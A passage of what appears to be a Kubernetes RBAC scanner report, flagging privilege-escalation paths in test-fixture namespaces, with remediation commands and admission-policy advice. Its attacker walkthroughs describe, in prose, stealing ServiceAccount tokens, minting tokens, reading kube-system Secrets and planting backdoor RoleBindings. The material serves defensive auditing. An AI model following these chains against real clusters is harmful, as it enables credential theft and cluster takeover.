Category: Data Exfiltration Subject: ServiceAccount/rbac-fixtures/sa-pod-create

Subject ServiceAccount/rbac-fixtures/sa-pod-create has a privesc path that terminates in get/list/watch secrets in kube-system. This is not full cluster-admin, but it is the most consequential namespace to read. kube-system Secrets typically contain the credentials that *unlock* cluster-admin: cloud IAM keys (cloud-controller-manager, EBS/PD/Disk CSI), registry pull secrets (system images), addon API keys, and tokens for SAs that are themselves bound to cluster-admin (operator installers, helm-controllers).

The chain (2 hop(s); each step uses an explicit RBAC verb the engine validated):
1. ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/vulnerable/privileged-reader via pod_create_token_theft (create pods): can create pods that mount ServiceAccount vulnerable/privileged-reader
2. ServiceAccount/vulnerable/privileged-reader/ via read_secrets (get,list secrets): can read secrets in kube-system or cluster-wide

In production clusters this path is the single most common one in kubesplaining's output. secrets:get is over-granted by Helm chart defaults, by stale view-style roles, and by ConfigMap-reader roles that wildcard resources to include Secrets. The path is short (often 1-2 hops) and exploitation is trivial: the attacker decodes base64 and is in.

Impact Reading kube-system Secrets typically yields cloud-account compromise, registry write (supply-chain implant), and tokens for cluster-admin-adjacent SAs. In practice, this is a one-way ratchet to full cluster control through subsequent privesc paths.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload mounting ServiceAccount/rbac-fixtures/sa-pod-create.
  2. Acting as ServiceAccount/rbac-fixtures/sa-pod-create, the attacker creates a pod that mounts the ServiceAccount/vulnerable/privileged-reader ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/vulnerable/privileged-reader, the attacker reads ServiceAccount tokens out of the cluster's Secrets store (get,list secrets) and uses one of those tokens (typically a control-plane controller's) to escalate. Read-access on Secrets is the most consequential single verb in Kubernetes RBAC because every other identity's credential lives in a Secret object somewhere.
  4. Final step: the attacker has get secrets -n kube-system. They list every Secret, decode each data value, and pull cloud IAM credentials, registry pull secrets, addon API keys, and SA tokens for cluster-admin-adjacent operators. Each of those is a separate privesc path, often shorter than the one that got them here.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/vulnerable/privileged-reader
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount vulnerable/privileged-reader
  2. Step 2 of 2 Secrets read access read_secrets

    get/list/watch on Secrets in kube-system or cluster-wide reads the controller-manager, scheduler, and node-bootstrap tokens: every credential needed to act as the control plane.

    From ServiceAccount/vulnerable/privileged-reader
    Permission granted get,list secrets
    Gives the attacker can read secrets in kube-system or cluster-wide
Remediation
Eliminate the path by tightening secrets:get in kube-system to a narrow allowlist of system controllers, then break the chain at: remove the create pods capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/vulnerable/privileged-reader).
  1. List who can get secrets -n kube-system: kubectl auth can-i get secrets -n kube-system --as=system:serviceaccount:<ns>:<sa> for every workload SA, and kubectl get rolebindings,clusterrolebindings -A -o yaml | grep -B5 secrets to find broad grants.
  2. Move kube-system Secrets that don't need to be live to External Secrets Operator (Vault/SecretsManager) so the in-cluster Secret becomes a generated artifact instead of source-of-truth.
  3. Break the chain at: remove the create pods capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/vulnerable/privileged-reader).
  4. For controllers that legitimately need a kube-system Secret read, scope the binding to that exact named Secret using resourceNames, not resources: [secrets].
  5. Wire admission policy: a Kyverno rule that fails any new RoleBinding/ClusterRoleBinding granting secrets verbs without resourceNames to non-system subjects.
HIGH ServiceAccount/rbac-fixtures/sa-token-create Namespace 8.1
ServiceAccount/rbac-fixtures/sa-token-create can read kube-system Secrets in 2 hop(s)
Scope · Namespace Source ServiceAccount/rbac-fixtures/sa-token-create → kube-system Secrets (control-plane namespace). Reads here typically yield credentials usable cluster-wide
Category: Data Exfiltration Subject: ServiceAccount/rbac-fixtures/sa-token-create

Subject ServiceAccount/rbac-fixtures/sa-token-create has a privesc path that terminates in get/list/watch secrets in kube-system. This is not full cluster-admin, but it is the most consequential namespace to read. kube-system Secrets typically contain the credentials that *unlock* cluster-admin: cloud IAM keys (cloud-controller-manager, EBS/PD/Disk CSI), registry pull secrets (system images), addon API keys, and tokens for SAs that are themselves bound to cluster-admin (operator installers, helm-controllers).

The chain (2 hop(s); each step uses an explicit RBAC verb the engine validated):
1. ServiceAccount/rbac-fixtures/sa-token-createServiceAccount/vulnerable/privileged-reader via token_request (create serviceaccounts/token): can mint tokens for ServiceAccount vulnerable/privileged-reader
2. ServiceAccount/vulnerable/privileged-reader/ via read_secrets (get,list secrets): can read secrets in kube-system or cluster-wide

In production clusters this path is the single most common one in kubesplaining's output. secrets:get is over-granted by Helm chart defaults, by stale view-style roles, and by ConfigMap-reader roles that wildcard resources to include Secrets. The path is short (often 1-2 hops) and exploitation is trivial: the attacker decodes base64 and is in.

Impact Reading kube-system Secrets typically yields cloud-account compromise, registry write (supply-chain implant), and tokens for cluster-admin-adjacent SAs. In practice, this is a one-way ratchet to full cluster control through subsequent privesc paths.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload mounting ServiceAccount/rbac-fixtures/sa-token-create.
  2. Acting as ServiceAccount/rbac-fixtures/sa-token-create, the attacker calls the serviceaccounts/token subresource (create serviceaccounts/token) to mint a fresh, valid token for ServiceAccount/vulnerable/privileged-reader. No pod creation required, and a thinner audit trail than the pod-mount route.
  3. Acting as ServiceAccount/vulnerable/privileged-reader, the attacker reads ServiceAccount tokens out of the cluster's Secrets store (get,list secrets) and uses one of those tokens (typically a control-plane controller's) to escalate. Read-access on Secrets is the most consequential single verb in Kubernetes RBAC because every other identity's credential lives in a Secret object somewhere.
  4. Final step: the attacker has get secrets -n kube-system. They list every Secret, decode each data value, and pull cloud IAM credentials, registry pull secrets, addon API keys, and SA tokens for cluster-admin-adjacent operators. Each of those is a separate privesc path, often shorter than the one that got them here.
  1. Step 1 of 2 TokenRequest minting token_request

    The create verb on serviceaccounts/token mints a fresh, valid token for any ServiceAccount in scope, with no pod required. Cleaner than the pod-creation route and harder to spot in audit logs.

    From ServiceAccount/rbac-fixtures/sa-token-createServiceAccount/vulnerable/privileged-reader
    Permission granted create serviceaccounts/token
    Gives the attacker can mint tokens for ServiceAccount vulnerable/privileged-reader
  2. Step 2 of 2 Secrets read access read_secrets

    get/list/watch on Secrets in kube-system or cluster-wide reads the controller-manager, scheduler, and node-bootstrap tokens: every credential needed to act as the control plane.

    From ServiceAccount/vulnerable/privileged-reader
    Permission granted get,list secrets
    Gives the attacker can read secrets in kube-system or cluster-wide
Remediation
Eliminate the path by tightening secrets:get in kube-system to a narrow allowlist of system controllers, then break the chain at: remove the permission create serviceaccounts/token that enables the first hop (ServiceAccount/rbac-fixtures/sa-token-createServiceAccount/vulnerable/privileged-reader).
  1. List who can get secrets -n kube-system: kubectl auth can-i get secrets -n kube-system --as=system:serviceaccount:<ns>:<sa> for every workload SA, and kubectl get rolebindings,clusterrolebindings -A -o yaml | grep -B5 secrets to find broad grants.
  2. Move kube-system Secrets that don't need to be live to External Secrets Operator (Vault/SecretsManager) so the in-cluster Secret becomes a generated artifact instead of source-of-truth.
  3. Break the chain at: remove the permission create serviceaccounts/token that enables the first hop (ServiceAccount/rbac-fixtures/sa-token-createServiceAccount/vulnerable/privileged-reader).
  4. For controllers that legitimately need a kube-system Secret read, scope the binding to that exact named Secret using resourceNames, not resources: [secrets].
  5. Wire admission policy: a Kyverno rule that fails any new RoleBinding/ClusterRoleBinding granting secrets verbs without resourceNames to non-system subjects.
HIGH

Subjects can reach namespace-admin in `rbac-ns-fixtures` in 1 hop(s)

KUBE-PRIVESC-PATH-NAMESPACE-ADMIN 4 subjects Score 7.6–7.1
MITRE ATT&CK: T1078.004T1098T1068

Affected subjects (4)

HIGH ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate Namespace 7.6
ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate can reach namespace-admin in `rbac-ns-fixtures` in 1 hop(s)
Scope · Namespace Source ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate → namespace-admin in rbac-ns-fixtures: every workload, Secret, and ConfigMap inside rbac-ns-fixtures becomes attacker-controlled
Category: Privilege Escalation Subject: ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate Resource: Namespace/rbac-ns-fixtures/rbac-ns-fixtures

Subject ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate has a privesc path that ends at namespace-admin inside rbac-ns-fixtures. The chain leans on a namespace-scoped RBAC primitive — typically create rolebindings (KUBE-PRIVESC-010) or bind/escalate roles (KUBE-PRIVESC-009) granted by a RoleBinding — which lets the subject bind itself (or any subject it controls) to a powerful ClusterRole *within this namespace*. The result is full API control inside rbac-ns-fixtures but, importantly, it does not by itself reach cluster-admin: the binding cannot mutate cluster-scoped resources, and the bound ClusterRole's verbs apply only inside the binding's namespace.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate/ via modify_role_binding (create,update,patch rolebindings): can create or mutate RoleBindings in namespace rbac-ns-fixtures to grant itself any role within rbac-ns-fixtures

Namespace-admin is a real and frequently underweighted privesc class. In multi-tenant clusters where each tenant lives in its own namespace, namespace-admin == tenant takeover: every other tenant workload running in the same namespace, every Secret stored there, every PVC bound there. It also commonly chains *out* of the namespace — a controller's ServiceAccount inside this namespace may be cluster-scoped, and once the attacker can mint a binding for it locally they can pivot via that SA's cluster-wide reach. Treat namespace-admin findings as one investigation away from cluster-admin, not as "safe because bounded".

Impact Compromise of ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate yields full takeover of rbac-ns-fixtures: every Secret/ConfigMap is readable, every pod is exec-able, every workload runs as whatever ServiceAccount the attacker chooses. If any in-namespace ServiceAccount is itself bound cluster-wide (controllers, operators, sidecars with elevated SAs), this also becomes a stepping stone to cluster-admin.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker compromises any workload or credential bound to ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate (RCE, leaked token, malicious image).
  2. Acting as ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate, the attacker abuses RoleBinding write access (create,update,patch rolebindings) to add themselves (or any subject they control) to a high-privilege ClusterRoleBinding, typically cluster-admin. They don't need the target role's permissions today, only the ability to change bindings.
  3. Final step: the attacker holds an identity that can verbs:[*] on resources:[*] inside rbac-ns-fixtures. They read every Secret and ConfigMap in rbac-ns-fixtures, exec into every pod, mount every PersistentVolume, and plant a backdoor RoleBinding (or a privileged DaemonSet on a namespace-scoped tenant operator) for persistence.
  1. RoleBinding write access modify_role_binding

    create/update/patch on rolebindings or clusterrolebindings lets the attacker bind themselves to any role, typically cluster-admin. They don't need the role's permissions today, only the ability to change bindings.

    Scope matters. Granted at cluster scope (via a ClusterRoleBinding, or with cluster-wide reach on rolebindings) the reach is cluster-admin equivalent. Granted by a RoleBinding the reach is bounded to that one namespace — full namespace-admin, but the bound ClusterRole's verbs apply only inside the binding's namespace.

    From ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate
    Permission granted create,update,patch rolebindings
    Gives the attacker can create or mutate RoleBindings in namespace rbac-ns-fixtures to grant itself any role within rbac-ns-fixtures
Remediation
Break the chain at the weakest hop and tighten RBAC writes inside rbac-ns-fixtures: remove the create,update,patch rolebindings capability that enables hop 1 (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate/).
  1. Confirm the chain with kubectl auth can-i create rolebindings -n rbac-ns-fixtures --as=system:serviceaccount:rbac-ns-fixtures:sa-ns-rolebinding-mutate (and bind/escalate on roles) — both should return no for any non-admin workload.
  2. Identify the lowest-cost hop to break (typically remove the create,update,patch rolebindings capability that enables hop 1 (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate/)); removing one mid-chain hop kills the entire path.
  3. Audit Roles in rbac-ns-fixtures granting RBAC writes: kubectl get role -n rbac-ns-fixtures -o json | jq '.items[] | select(.rules[]? | .resources[]? | contains("rolebindings") or contains("roles"))'. Most workloads should have zero RBAC write rights.
  4. Move RBAC management to GitOps (Argo CD/Flux) so any RoleBinding change requires a PR. The GitOps controller should be the only namespace-local identity with RBAC write access.
  5. Wire admission policy: a Kyverno or OPA Gatekeeper rule that fails any new RoleBinding in rbac-ns-fixtures whose roleRef points at cluster-admin, admin, or any ClusterRole matching *system:* outside an explicit allowlist.
HIGH ServiceAccount/rbac-fixtures/sa-pod-create Namespace 7.1
ServiceAccount/rbac-fixtures/sa-pod-create can reach namespace-admin in `rbac-ns-fixtures` in 2 hop(s)
Scope · Namespace Source ServiceAccount/rbac-fixtures/sa-pod-create → namespace-admin in rbac-ns-fixtures: every workload, Secret, and ConfigMap inside rbac-ns-fixtures becomes attacker-controlled
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-pod-create Resource: Namespace/rbac-ns-fixtures/rbac-ns-fixtures

Subject ServiceAccount/rbac-fixtures/sa-pod-create has a privesc path that ends at namespace-admin inside rbac-ns-fixtures. The chain leans on a namespace-scoped RBAC primitive — typically create rolebindings (KUBE-PRIVESC-010) or bind/escalate roles (KUBE-PRIVESC-009) granted by a RoleBinding — which lets the subject bind itself (or any subject it controls) to a powerful ClusterRole *within this namespace*. The result is full API control inside rbac-ns-fixtures but, importantly, it does not by itself reach cluster-admin: the binding cannot mutate cluster-scoped resources, and the bound ClusterRole's verbs apply only inside the binding's namespace.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate via pod_create_token_theft (create pods): can create pods that mount ServiceAccount rbac-ns-fixtures/sa-ns-rolebinding-mutate
2. ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate/ via modify_role_binding (create,update,patch rolebindings): can create or mutate RoleBindings in namespace rbac-ns-fixtures to grant itself any role within rbac-ns-fixtures

Namespace-admin is a real and frequently underweighted privesc class. In multi-tenant clusters where each tenant lives in its own namespace, namespace-admin == tenant takeover: every other tenant workload running in the same namespace, every Secret stored there, every PVC bound there. It also commonly chains *out* of the namespace — a controller's ServiceAccount inside this namespace may be cluster-scoped, and once the attacker can mint a binding for it locally they can pivot via that SA's cluster-wide reach. Treat namespace-admin findings as one investigation away from cluster-admin, not as "safe because bounded".

Impact Compromise of ServiceAccount/rbac-fixtures/sa-pod-create yields full takeover of rbac-ns-fixtures: every Secret/ConfigMap is readable, every pod is exec-able, every workload runs as whatever ServiceAccount the attacker chooses. If any in-namespace ServiceAccount is itself bound cluster-wide (controllers, operators, sidecars with elevated SAs), this also becomes a stepping stone to cluster-admin.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker compromises any workload or credential bound to ServiceAccount/rbac-fixtures/sa-pod-create (RCE, leaked token, malicious image).
  2. Acting as ServiceAccount/rbac-fixtures/sa-pod-create, the attacker creates a pod that mounts the ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate, the attacker abuses RoleBinding write access (create,update,patch rolebindings) to add themselves (or any subject they control) to a high-privilege ClusterRoleBinding, typically cluster-admin. They don't need the target role's permissions today, only the ability to change bindings.
  4. Final step: the attacker holds an identity that can verbs:[*] on resources:[*] inside rbac-ns-fixtures. They read every Secret and ConfigMap in rbac-ns-fixtures, exec into every pod, mount every PersistentVolume, and plant a backdoor RoleBinding (or a privileged DaemonSet on a namespace-scoped tenant operator) for persistence.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount rbac-ns-fixtures/sa-ns-rolebinding-mutate
  2. Step 2 of 2 RoleBinding write access modify_role_binding

    create/update/patch on rolebindings or clusterrolebindings lets the attacker bind themselves to any role, typically cluster-admin. They don't need the role's permissions today, only the ability to change bindings.

    Scope matters. Granted at cluster scope (via a ClusterRoleBinding, or with cluster-wide reach on rolebindings) the reach is cluster-admin equivalent. Granted by a RoleBinding the reach is bounded to that one namespace — full namespace-admin, but the bound ClusterRole's verbs apply only inside the binding's namespace.

    From ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate
    Permission granted create,update,patch rolebindings
    Gives the attacker can create or mutate RoleBindings in namespace rbac-ns-fixtures to grant itself any role within rbac-ns-fixtures
Remediation
Break the chain at the weakest hop and tighten RBAC writes inside rbac-ns-fixtures: remove the create,update,patch rolebindings capability that enables hop 2 (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate/).
  1. Confirm the chain with kubectl auth can-i create rolebindings -n rbac-ns-fixtures --as=system:serviceaccount:rbac-fixtures:sa-pod-create (and bind/escalate on roles) — both should return no for any non-admin workload.
  2. Identify the lowest-cost hop to break (typically remove the create,update,patch rolebindings capability that enables hop 2 (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate/)); removing one mid-chain hop kills the entire path.
  3. Audit Roles in rbac-ns-fixtures granting RBAC writes: kubectl get role -n rbac-ns-fixtures -o json | jq '.items[] | select(.rules[]? | .resources[]? | contains("rolebindings") or contains("roles"))'. Most workloads should have zero RBAC write rights.
  4. Move RBAC management to GitOps (Argo CD/Flux) so any RoleBinding change requires a PR. The GitOps controller should be the only namespace-local identity with RBAC write access.
  5. Wire admission policy: a Kyverno or OPA Gatekeeper rule that fails any new RoleBinding in rbac-ns-fixtures whose roleRef points at cluster-admin, admin, or any ClusterRole matching *system:* outside an explicit allowlist.
HIGH ServiceAccount/rbac-fixtures/sa-token-create Namespace 7.1
ServiceAccount/rbac-fixtures/sa-token-create can reach namespace-admin in `rbac-ns-fixtures` in 2 hop(s)
Scope · Namespace Source ServiceAccount/rbac-fixtures/sa-token-create → namespace-admin in rbac-ns-fixtures: every workload, Secret, and ConfigMap inside rbac-ns-fixtures becomes attacker-controlled
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-token-create Resource: Namespace/rbac-ns-fixtures/rbac-ns-fixtures

Subject ServiceAccount/rbac-fixtures/sa-token-create has a privesc path that ends at namespace-admin inside rbac-ns-fixtures. The chain leans on a namespace-scoped RBAC primitive — typically create rolebindings (KUBE-PRIVESC-010) or bind/escalate roles (KUBE-PRIVESC-009) granted by a RoleBinding — which lets the subject bind itself (or any subject it controls) to a powerful ClusterRole *within this namespace*. The result is full API control inside rbac-ns-fixtures but, importantly, it does not by itself reach cluster-admin: the binding cannot mutate cluster-scoped resources, and the bound ClusterRole's verbs apply only inside the binding's namespace.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-token-createServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate via token_request (create serviceaccounts/token): can mint tokens for ServiceAccount rbac-ns-fixtures/sa-ns-rolebinding-mutate
2. ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate/ via modify_role_binding (create,update,patch rolebindings): can create or mutate RoleBindings in namespace rbac-ns-fixtures to grant itself any role within rbac-ns-fixtures

Namespace-admin is a real and frequently underweighted privesc class. In multi-tenant clusters where each tenant lives in its own namespace, namespace-admin == tenant takeover: every other tenant workload running in the same namespace, every Secret stored there, every PVC bound there. It also commonly chains *out* of the namespace — a controller's ServiceAccount inside this namespace may be cluster-scoped, and once the attacker can mint a binding for it locally they can pivot via that SA's cluster-wide reach. Treat namespace-admin findings as one investigation away from cluster-admin, not as "safe because bounded".

Impact Compromise of ServiceAccount/rbac-fixtures/sa-token-create yields full takeover of rbac-ns-fixtures: every Secret/ConfigMap is readable, every pod is exec-able, every workload runs as whatever ServiceAccount the attacker chooses. If any in-namespace ServiceAccount is itself bound cluster-wide (controllers, operators, sidecars with elevated SAs), this also becomes a stepping stone to cluster-admin.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker compromises any workload or credential bound to ServiceAccount/rbac-fixtures/sa-token-create (RCE, leaked token, malicious image).
  2. Acting as ServiceAccount/rbac-fixtures/sa-token-create, the attacker calls the serviceaccounts/token subresource (create serviceaccounts/token) to mint a fresh, valid token for ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate. No pod creation required, and a thinner audit trail than the pod-mount route.
  3. Acting as ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate, the attacker abuses RoleBinding write access (create,update,patch rolebindings) to add themselves (or any subject they control) to a high-privilege ClusterRoleBinding, typically cluster-admin. They don't need the target role's permissions today, only the ability to change bindings.
  4. Final step: the attacker holds an identity that can verbs:[*] on resources:[*] inside rbac-ns-fixtures. They read every Secret and ConfigMap in rbac-ns-fixtures, exec into every pod, mount every PersistentVolume, and plant a backdoor RoleBinding (or a privileged DaemonSet on a namespace-scoped tenant operator) for persistence.
  1. Step 1 of 2 TokenRequest minting token_request

    The create verb on serviceaccounts/token mints a fresh, valid token for any ServiceAccount in scope, with no pod required. Cleaner than the pod-creation route and harder to spot in audit logs.

    From ServiceAccount/rbac-fixtures/sa-token-createServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate
    Permission granted create serviceaccounts/token
    Gives the attacker can mint tokens for ServiceAccount rbac-ns-fixtures/sa-ns-rolebinding-mutate
  2. Step 2 of 2 RoleBinding write access modify_role_binding

    create/update/patch on rolebindings or clusterrolebindings lets the attacker bind themselves to any role, typically cluster-admin. They don't need the role's permissions today, only the ability to change bindings.

    Scope matters. Granted at cluster scope (via a ClusterRoleBinding, or with cluster-wide reach on rolebindings) the reach is cluster-admin equivalent. Granted by a RoleBinding the reach is bounded to that one namespace — full namespace-admin, but the bound ClusterRole's verbs apply only inside the binding's namespace.

    From ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate
    Permission granted create,update,patch rolebindings
    Gives the attacker can create or mutate RoleBindings in namespace rbac-ns-fixtures to grant itself any role within rbac-ns-fixtures
Remediation
Break the chain at the weakest hop and tighten RBAC writes inside rbac-ns-fixtures: remove the create,update,patch rolebindings capability that enables hop 2 (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate/).
  1. Confirm the chain with kubectl auth can-i create rolebindings -n rbac-ns-fixtures --as=system:serviceaccount:rbac-fixtures:sa-token-create (and bind/escalate on roles) — both should return no for any non-admin workload.
  2. Identify the lowest-cost hop to break (typically remove the create,update,patch rolebindings capability that enables hop 2 (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate/)); removing one mid-chain hop kills the entire path.
  3. Audit Roles in rbac-ns-fixtures granting RBAC writes: kubectl get role -n rbac-ns-fixtures -o json | jq '.items[] | select(.rules[]? | .resources[]? | contains("rolebindings") or contains("roles"))'. Most workloads should have zero RBAC write rights.
  4. Move RBAC management to GitOps (Argo CD/Flux) so any RoleBinding change requires a PR. The GitOps controller should be the only namespace-local identity with RBAC write access.
  5. Wire admission policy: a Kyverno or OPA Gatekeeper rule that fails any new RoleBinding in rbac-ns-fixtures whose roleRef points at cluster-admin, admin, or any ClusterRole matching *system:* outside an explicit allowlist.
HIGH ServiceAccount/vulnerable/privileged-reader Namespace 7.1
ServiceAccount/vulnerable/privileged-reader can reach namespace-admin in `rbac-ns-fixtures` in 2 hop(s)
Scope · Namespace Source ServiceAccount/vulnerable/privileged-reader → namespace-admin in rbac-ns-fixtures: every workload, Secret, and ConfigMap inside rbac-ns-fixtures becomes attacker-controlled
Category: Privilege Escalation Subject: ServiceAccount/vulnerable/privileged-reader Resource: Namespace/rbac-ns-fixtures/rbac-ns-fixtures

Subject ServiceAccount/vulnerable/privileged-reader has a privesc path that ends at namespace-admin inside rbac-ns-fixtures. The chain leans on a namespace-scoped RBAC primitive — typically create rolebindings (KUBE-PRIVESC-010) or bind/escalate roles (KUBE-PRIVESC-009) granted by a RoleBinding — which lets the subject bind itself (or any subject it controls) to a powerful ClusterRole *within this namespace*. The result is full API control inside rbac-ns-fixtures but, importantly, it does not by itself reach cluster-admin: the binding cannot mutate cluster-scoped resources, and the bound ClusterRole's verbs apply only inside the binding's namespace.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/vulnerable/privileged-readerServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate via pod_create_token_theft (create pods): can create pods that mount ServiceAccount rbac-ns-fixtures/sa-ns-rolebinding-mutate
2. ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate/ via modify_role_binding (create,update,patch rolebindings): can create or mutate RoleBindings in namespace rbac-ns-fixtures to grant itself any role within rbac-ns-fixtures

Namespace-admin is a real and frequently underweighted privesc class. In multi-tenant clusters where each tenant lives in its own namespace, namespace-admin == tenant takeover: every other tenant workload running in the same namespace, every Secret stored there, every PVC bound there. It also commonly chains *out* of the namespace — a controller's ServiceAccount inside this namespace may be cluster-scoped, and once the attacker can mint a binding for it locally they can pivot via that SA's cluster-wide reach. Treat namespace-admin findings as one investigation away from cluster-admin, not as "safe because bounded".

Impact Compromise of ServiceAccount/vulnerable/privileged-reader yields full takeover of rbac-ns-fixtures: every Secret/ConfigMap is readable, every pod is exec-able, every workload runs as whatever ServiceAccount the attacker chooses. If any in-namespace ServiceAccount is itself bound cluster-wide (controllers, operators, sidecars with elevated SAs), this also becomes a stepping stone to cluster-admin.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker compromises any workload or credential bound to ServiceAccount/vulnerable/privileged-reader (RCE, leaked token, malicious image).
